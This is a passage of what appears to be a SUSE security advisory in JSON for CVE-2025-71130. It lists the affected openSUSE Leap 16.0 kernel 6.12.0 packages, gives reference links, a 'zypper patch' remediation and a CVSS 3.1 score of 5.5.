"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71130",
"url": "https://www.suse.com/security/cve/CVE-2025-71130"
},
{
"category": "external",
"summary": "SUSE Bug 1256741 for CVE-2025-71130",
"url": "https://bugzilla.suse.com/1256741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
